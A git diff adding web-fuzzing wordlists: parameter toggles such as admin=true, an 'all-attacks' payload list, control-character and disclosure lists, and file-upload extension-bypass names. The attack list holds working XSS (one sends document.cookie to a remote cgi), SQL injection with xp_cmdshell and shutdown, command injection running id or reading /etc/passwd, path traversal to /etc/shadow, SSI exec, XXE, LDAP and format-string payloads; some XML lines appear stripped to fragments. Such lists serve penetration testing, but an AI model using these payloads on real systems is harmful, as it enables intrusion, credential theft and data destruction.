diff --git a/data/BizLogic.txt b/data/BizLogic.txt new file mode 100644 index 00000000..004ba8e5 --- /dev/null +++ b/data/BizLogic.txt @@ -0,0 +1,80 @@ +7357=1 +7357=true +7357=y +7357=yes +access=1 +access=true +access=y +access=yes +adm=1 +adm1n=1 +adm1n=true +adm1n=y +adm1n=yes +admin=1 +admin=true +admin=y +admin=yes +adm=true +adm=y +adm=yes +dbg=1 +dbg=true +dbg=y +dbg=yes +debug=1 +debug=true +debug=y +debug=yes +edit=1 +edit=true +edit=y +edit=yes +grant=1 +grant=true +grant=y +grant=yes +test=1 +test=true +test=y +test=yes +get +put +send +delete +remove +create +add +move +show +list +query +search +view +open +show +download +edit +change +alter +modify +test +update +save +load +close +make +upload +rename +reset +cancel +admin +demo +verify +vrfy +on +off +0 +1 +enable +disable diff --git a/data/all-attacks.txt b/data/all-attacks.txt new file mode 100644 index 00000000..bfac9bed --- /dev/null +++ b/data/all-attacks.txt @@ -0,0 +1,1134 @@ +!' +!@#$%%^#$%#$@#$%$$@#$%^^**(() +!@#0%^#0##018387@#0^^**(() +"> +< + +'> +'> +\";alert('XSS');// +%3cscript%3ealert("XSS");%3c/script%3e +%3cscript%3ealert(document.cookie);%3c%2fscript%3e +%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E +<script>alert(document.cookie); +<script>alert(document.cookie);<script>alert + + + + + + + +"> + + + + + + + + + + + + + +'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E +"> +%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} +'';!--"=&{()} +' +" +- +-- +' -- +--'; +' ; += ' += ; += -- +\x23 +\x27 +\x3D \x3B' +\x3D \x27 +\x27\x4F\x52 SELECT * +\x27\x6F\x72 SELECT * +'or select * +admin'-- +';shutdown-- +<>"'%;)(&+ +' or ''=' +' or 'x'='x +" or "x"="x +') or ('x'='x +0 or 1=1 +' or 0=0 -- +" or 0=0 -- +or 0=0 -- +' or 0=0 # +" or 0=0 # +or 0=0 # +' or 1=1-- +" or 1=1-- +' or '1'='1'-- +"' or 1 --'" +or 1=1-- +or%201=1 +or%201=1 -- +' or 1=1 or ''=' +" or 1=1 or ""=" +' or a=a-- +" or "a"="a +') or ('a'='a +") or ("a"="a +hi" or "a"="a +hi" or 1=1 -- +hi' or 1=1 -- +hi' or 'a'='a +hi') or ('a'='a +hi") or ("a"="a +'hi' or 'x'='x'; +@variable +,@variable +PRINT +PRINT @@variable +select +insert +as +or +procedure +limit +order by +asc +desc +delete +update +distinct +having +truncate +replace +like +handler +bfilename +' or username like '% +' or uname like '% +' or userid like '% +' or uid like '% +' or user like '% +exec xp +exec sp +'; exec master..xp_cmdshell +'; exec xp_regread +t'exec master..xp_cmdshell 'nslookup www.google.com'-- +--sp_password +\x27UNION SELECT +' UNION SELECT +' UNION ALL SELECT +' or (EXISTS) +' (select top 1 +'||UTL_HTTP.REQUEST +1;SELECT%20* +to_timestamp_tz +tz_offset +<>"'%;)(&+ +'%20or%201=1 +%27%20or%201=1 +%20$(sleep%2050) +%20'sleep%2050' +char%4039%41%2b%40SELECT +'%20OR +'sqlattempt1 +(sqlattempt2) +| +%7C +*| +%2A%7C +*(|(mail=*)) +%2A%28%7C%28mail%3D%2A%29%29 +*(|(objectclass=*)) +%2A%28%7C%28objectclass%3D%2A%29%29 +( +%28 +) +%29 +& +%26 +! +%21 +' or 1=1 or ''=' +' or ''=' +x' or 1=1 or 'x'='y +/ +// +//* +*/* +@* +count(/child::node()) +x' or name()='username' or 'x'='y +','')); phpinfo(); exit;/* +var n=0;while(true){n++;}]]> +SCRIPT]]>alert('XSS');/SCRIPT]]> +SCRIPT]]>alert('XSS');/SCRIPT]]> + +]>&xxe; +]>&xxe; +]>&xxe; +]>&xxe; +]]> +<IMG SRC="javascript:alert('XSS')"> + +XSS +' +'-- +' or 1=1-- +1 or 1=1-- +' or 1 in (@@version)-- +1 or 1 in (@@version)-- +'; waitfor delay '0:30:0'-- +1; waitfor delay '0:30:0'-- +'||Utl_Http.request('http://') from dual-- +1||Utl_Http.request('http://') from dual-- +xsstest +xsstest%00"<>' + + +)))))))))) +../../../../../../../../../../boot.ini +..\..\..\..\..\..\..\..\..\..\boot.ini +../../../../../../../../../../windows/win.ini +..\..\..\..\..\..\..\..\..\..\windows\win.ini +|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & +| ping -i 30 127.0.0.1 | +| ping -n 30 127.0.0.1 | +& ping -i 30 127.0.0.1 & +& ping -n 30 127.0.0.1 & +; ping 127.0.0.1 ; +%0a ping -i 30 127.0.0.1 %0a +`ping 127.0.0.1` +;echo 111111 +echo 111111 +response.write 111111 +:response.write 111111 +http:/// +%0aCc: +%0d%0aCc: +%0aBcc: +%0d%0aBcc: +%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a +%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a +%70 +.%E2%73%70 +%2e0 +%2e +. +\ +?* +%20 +%00 +%2f +%5c +count(/child::node()) +x' or name()='username' or 'x'='y +var n=0;while(true){n++;}]]> +SCRIPT]]>alert('XSS');/SCRIPT]]> +"SCRIPT]]>alert('XSS');/SCRIPT]]>" +"" +"]>&xxe;" +"]>&xxe;" +"]>&xxe;" +"]>&xxe;" +"]]>" +"cript:alert('XSS')"">" +"" +"XSS" +%00 +NULL +null +' +" +; + +"> +%0d +%0a +%7f +%ff +-1 +other +%s%p%x%d +%99999999999s +%08x +%20d +%20n +%20x +%20s +%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d +%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i +%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o +%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u +%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x +%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X +%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a +%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A +%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e +%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E +%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f +%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F +%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g +%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G +%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s +%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p +%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% +XXXXX.%p +XXXXX`perl -e 'print ".%p" x 80'` +`perl -e 'print ".%p" x 80'`%n +! +!' +!@#$%%^#$%#$@#$%$$@#$%^^**(() +!@#0%^#0##018387@#0^^**(() +" +" or "a"="a +" or "x"="x +" or 0=0 # +" or 0=0 -- +" or 1=1 or ""=" +" or 1=1-- +"' or 1 --'" +") or ("a"="a +"]>&xxe;" +"]>&xxe;" +"" +"SCRIPT]]>alert('XSS');/SCRIPT]]>" +"XSS" +"cript:alert('XSS')"">" +"]]>" +"> +"> +">xxx

yyy +"\t" +$NULL +$null +% +%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%% +%00 +%00../../../../../../etc/passwd +%00../../../../../../etc/shadow +%00/ +%00/etc/passwd%00 +%01%02%03%04%0a%0d%0aADSF +%08x +%0A/usr/bin/id +%0A/usr/bin/id%0A +%0Aid +%0Aid%0A +%0a ping -i 30 127.0.0.1 %0a +%oa ping -n 30 127.0.0.1 %0a +%0a id %0a +%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+%0aRCPT+TO:+%0aDATA%0aFrom:+%0aTo:+%0aSubject:+tst%0afoo%0a%2e%0a +%0d +%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+%0d%0aRCPT+TO:+%0d%0aDATA%0d%0aFrom:+%0d%0aTo:+%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a +%0d%0aX-Injection-Header:%20AttackValue +%20 +%20$(sleep%2050) +%20'sleep%2050' +%20d +%20n +%20s +%20x +%20| +%21 +%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00 +%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 +%2500 +%250a +%26 +%27%20or%201=1 +%28 +%29 +%2A +%2A%28%7C%28mail%3D%2A%29%29 +%2A%28%7C%28objectclass%3D%2A%29%29 +%2A%7C +%2C +%2e%2e%2f +%3C +%3C%3F +%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E +%3cscript%3ealert("XSS");%3c/script%3e +%3cscript%3ealert(document.cookie);%3c%2fscript%3e +%5C +%5C/ +%60 +%7C +%7f +%99999999999s +%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A +%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E +%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F +%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G +%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X +%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a +%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d +%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e +%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f +%ff +%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g +%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i +%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o +%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p +%s%p%x%d +%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s +%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u +%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x +& +& id +& ping -i 30 127.0.0.1 & +& ping -n 30 127.0.0.1 & +< +< +< +< +< +< +< +< +< +< + + + + +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +< +' +'%20OR +&id +< +< +<!--#exec%20cmd="/bin/cat%20/etc/passwd"--> +<!--#exec%20cmd="/bin/cat%20/etc/shadow"--> +<!--#exec%20cmd="/usr/bin/id;--> +<>"'%;)(&+ +<script>alert(document.cookie);<script>alert +<script>alert(document.cookie); +";id" +' +' (select top 1 +' -- +' ; +' UNION ALL SELECT +' UNION SELECT +' or ''=' +' or '1'='1 +' or '1'='1'-- +' or 'x'='x +' or (EXISTS) +' or 0=0 # +' or 0=0 -- +' or 1 in (@@version)-- +' or 1=1 or ''=' +' or 1=1-- +' or a=a-- +' or uid like '% +' or uname like '% +' or user like '% +' or userid like '% +' or username like '% +'%20or%201=1 +'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E +'';!--"=&{()} +') or ('a'='a +'-- +'; exec master..xp_cmdshell +'; exec xp_regread +'; waitfor delay '0:30:0'-- +';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//>!--=&{} +';shutdown-- +'> +'> +'hi' or 'x'='x'; +'or select * +'sqlattempt1 +'||UTL_HTTP.REQUEST +'||Utl_Http.request('http://') from dual-- +( +(') +(sqlattempt2) +) +)))))))))) +* +*' +*' +*(|(mail=*)) +*(|(objectclass=*)) +*/* +*| ++ ++%00 +,@variable +- +-- +--'; +--sp_password +-1 +-1.0 +-2 +-20 +-268435455 +..%%35%63 +..%%35c +..%25%35%63 +..%255c +..%5c +..%bg%qf +..%c0%af +..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini +..%u2215 +..%u2216 +../ +../../../../../../../../../../../../etc/hosts +../../../../../../../../../../../../etc/hosts%00 +../../../../../../../../../../../../etc/passwd +../../../../../../../../../../../../etc/passwd%00 +../../../../../../../../../../../../etc/shadow +../../../../../../../../../../../../etc/shadow%00 +..\ +..\..\..\..\..\..\..\..\..\..\etc\passwd +..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +..\..\..\..\..\..\..\..\..\..\etc\shadow +..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd +.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow +/ +/%00/ +/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00 +/%2A +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd +/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow +/' +/' +/,%ENV,/ +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd +/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow +/.../.../.../.../.../ +/../../../../../../../../%2A +/../../../../../../../../../../../etc/passwd%00.html +/../../../../../../../../../../../etc/passwd%00.jpg +/../../../../../../../../../../etc/passwd +/../../../../../../../../../../etc/passwd^^ +/../../../../../../../../../../etc/shadow +/../../../../../../../../../../etc/shadow^^ +/../../../../../../../../bin/id| +/..\../..\../..\../..\../..\../..\../boot.ini +/..\../..\../..\../..\../..\../..\../etc/passwd +/..\../..\../..\../..\../..\../..\../etc/shadow +/./././././././././././etc/passwd +/./././././././././././etc/shadow +// +//* +/etc/passwd +/etc/shadow +/index.html|id| +0 +0 or 1=1 +00 +0xfffffff +1 +1 or 1 in (@@version)-- +1 or 1=1-- +1.0 +1; waitfor delay '0:30:0'-- +1;SELECT%20* +1||Utl_Http.request('http://') from dual-- +2 +2147483647 +268435455 +65536 +:response.write 111111 +; +; ping 127.0.0.1 ; +;/usr/bin/id\n +;echo 111111 +;id +;id; +;id\n +;id| +;ls -la +;system('/usr/bin/id') +;system('cat%20/etc/passwd') +;system('id') +;|/usr/bin/id| +< +< script > < / script> +SCRIPT]]>alert('XSS');/SCRIPT]]> +var n=0;while(true){n++;}]]> + +<< +<<< +< +<>"'%;)(&+ +]>&xxe; +]>&xxe; +]>&xxe; +]>&xxe; + +SCRIPT]]>alert('XSS');/SCRIPT]]> +XSS +"> + + + + + + + + + + + + + + + + + + + + +','')); phpinfo(); exit;/* + + +<IMG SRC="javascript:alert('XSS')"> +]]> + + +%0aBcc: +%0aCc: +%0d%0aBcc: +%0d%0aCc: += +=' +=-- +=; +> +?x= +?x=" +?x=> +?x=| +@' +@' +@* +@variable +A +ABCD|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x|%8.8x| +FALSE +NULL +PRINT +PRINT @@variable +TRUE +XXXXX.%p +XXXXX`perl -e 'print ".%p" x 80'` +['] +['] +\ +\";alert('XSS');// +\"blah +\' +\' +\..\..\..\..\..\..\..\..\..\..\etc\passwd +\..\..\..\..\..\..\..\..\..\..\etc\passwd%00 +\..\..\..\..\..\..\..\..\..\..\etc\shadow +\..\..\..\..\..\..\..\..\..\..\etc\shadow%00 +\0 +\00 +\00\00 +\00\00\00 +\0\0 +\0\0\0 +\\ +\\'/bin/cat%20/etc/passwd\\' +\\'/bin/cat%20/etc/shadow\\' +\\/ +\\\\* +\\\\?\\ +\n/bin/ls -al\n +\n/usr/bin/id; +\n/usr/bin/id\n +\n/usr/bin/id| +\nid; +\nid\n +\nid| +\nnetstat -a%\n +\t +\u003C +\u003c +\x23 +\x27 +\x27UNION SELECT +\x27\x4F\x52 SELECT * +\x27\x6F\x72 SELECT * +\x3C +\x3D \x27 +\x3D \x3B' +\x3c +^' +^' +` +`/usr/bin/id` +`dir` +`id` +`perl -e 'print ".%p" x 80'`%n +`ping 127.0.0.1` +a);/usr/bin/id +a);/usr/bin/id; +a);/usr/bin/id| +a);id +a);id; +a);id| +a)|/usr/bin/id +a)|/usr/bin/id; +a)|id +a)|id; +a;/usr/bin/id +a;/usr/bin/id; +a;/usr/bin/id| +a;id +a;id; +a;id| +http:/// +id%00 +id%00| +insert +like +limit +null +or +or 0=0 # +or 0=0 -- +or 1=1-- +or%201=1 +or%201=1 -- +response.write 111111 +something%00html +update +x' or 1=1 or 'x'='y +x' or name()='username' or 'x'='y +xsstest +xsstest%00"<>' +{'} +|/usr/bin/id +|/usr/bin/id| +|id +|id; +|id| +|ls +|ls -la +|nid\n +|usr/bin/id\n +|| +|| ping -i 30 127.0.0.1 ; x || ping -n 30 127.0.0.1 & +||/usr/bin/id; +||/usr/bin/id| +} diff --git a/data/control-chars.txt b/data/control-chars.txt new file mode 100644 index 00000000..49835348 --- /dev/null +++ b/data/control-chars.txt @@ -0,0 +1,271 @@ +%00 +%01 +%02 +%03 +%04 +%05 +%06 +%07 +%08 +%09 +%0a +%0b +%0c +%0d +%0e +%0f +%10 +%11 +%12 +%13 +%14 +%15 +%16 +%17 +%18 +%19 +%1a +%1b +%1c +%1d +%1e +%1f +%20 +%21 +%22 +%23 +%24 +%25 +%26 +%27 +%28 +%29 +%2a +%2b +%2c +%2d +%2e +%2f +%30 +%31 +%32 +%33 +%34 +%35 +%36 +%37 +%38 +%39 +%3a +%3b +%3c +%3d +%3e +%3f +%40 +%41 +%42 +%43 +%44 +%45 +%46 +%47 +%48 +%49 +%4a +%4b +%4c +%4d +%4e +%4f +%50 +%51 +%52 +%53 +%54 +%55 +%56 +%57 +%58 +%59 +%5a +%5b +%5c +%5d +%5e +%5f +%60 +%61 +%62 +%63 +%64 +%65 +%66 +%67 +%68 +%69 +%6a +%6b +%6c +%6d +%6e +%6f +%70 +%71 +%72 +%73 +%74 +%75 +%76 +%77 +%78 +%79 +%7a +%7b +%7c +%7d +%7e +%7f +%80 +%81 +%82 +%83 +%84 +%85 +%86 +%87 +%88 +%89 +%8a +%8b +%8c +%8d +%8e +%8f +%90 +%91 +%92 +%93 +%94 +%95 +%96 +%97 +%98 +%99 +%9a +%9b +%9c +%9d +%9e +%9f +%a0 +%a1 +%a2 +%a3 +%a4 +%a5 +%a6 +%a7 +%a8 +%a9 +%aa +%ab +%ac +%ad +%ae +%af +%b0 +%b1 +%b2 +%b3 +%b4 +%b5 +%b6 +%b7 +%b8 +%b9 +%ba +%bb +%bc +%bd +%be +%bf +%c0 +%c1 +%c2 +%c3 +%c4 +%c5 +%c6 +%c7 +%c8 +%c9 +%ca +%cb +%cc +%cd +%ce +%cf +%d0 +%d1 +%d2 +%d3 +%d4 +%d5 +%d6 +%d7 +%d8 +%d9 +%da +%db +%dc +%dd +%de +%df +%e0 +%e1 +%e2 +%e3 +%e4 +%e5 +%e6 +%e7 +%e8 +%e9 +%ea +%eb +%ec +%ed +%ee +%ef +%f0 +%f1 +%f2 +%f3 +%f4 +%f5 +%f6 +%f7 +%f8 +%f9 +%fa +%fb +%fc +%fd +%fe +%ff +%00 +\x00 +\u0000 +\0 +\00 +\000 +\z +NUL +NULL +0x00 +%00%00 +\x00\x00 +\u0000\u0000 +\0\0 +%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00%00 diff --git a/data/disclosure-directory.txt b/data/disclosure-directory.txt new file mode 100644 index 00000000..4ca08730 --- /dev/null +++ b/data/disclosure-directory.txt @@ -0,0 +1,10 @@ +/%3f.jsp +/?M=D +/?S=D +//////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////////// +/cgi-bin/test-cgi?/* +/cgi-bin/test-cgi?* +/%00/ +/%2e/ +/%2f/ +/%5c/ diff --git a/data/disclosure-localpaths.txt b/data/disclosure-localpaths.txt new file mode 100644 index 00000000..8b6f56ac --- /dev/null +++ b/data/disclosure-localpaths.txt @@ -0,0 +1,30 @@ +/apache/logs/error.log +/apache/logs/access.log +/apache/logs/error.log +/apache/logs/access.log +/apache/logs/error.log +/apache/logs/access.log +/etc/httpd/logs/acces_log +/etc/httpd/logs/acces.log +/etc/httpd/logs/error_log +/etc/httpd/logs/error.log +/var/www/logs/access_log +/var/www/logs/access.log +/usr/local/apache/logs/access_log +/usr/local/apache/logs/access.log +/var/log/apache/access_log +/var/log/apache2/access_log +/var/log/apache/access.log +/var/log/apache2/access.log +/var/log/access_log +/var/log/access.log +/var/www/logs/error_log +/var/www/logs/error.log +/usr/local/apache/logs/error_log +/usr/local/apache/logs/error.log +/var/log/apache/error_log +/var/log/apache2/error_log +/var/log/apache/error.log +/var/log/apache2/error.log +/var/log/error_log +/var/log/error.log diff --git a/data/disclosure-source.txt b/data/disclosure-source.txt new file mode 100644 index 00000000..e723a3f0 --- /dev/null +++ b/data/disclosure-source.txt @@ -0,0 +1,18 @@ ++.htr +::DATA$ +%70 +.%E2%73%70 +%2e0 +%2e +. +\ +?* +%20 +%00 +%2f +%5c +..%255c +.%5c../..%5c +/..%c0%9v../ +/..%c0%af../ +/..%255c..%255c diff --git a/data/file-upload.txt b/data/file-upload.txt new file mode 100644 index 00000000..e547a04d --- /dev/null +++ b/data/file-upload.txt @@ -0,0 +1,346 @@ +{PHPSCRIPT} +{PHPSCRIPT}.phtml +{PHPSCRIPT}.php.html +{PHPSCRIPT}.php::$DATA +{PHPSCRIPT}.php.php.rar +{PHPSCRIPT}.php.rar +{PHPSCRIPT}::$DATA +{PHPSCRIPT} +{PHPSCRIPT}.phtml +{PHPSCRIPT}.php.html 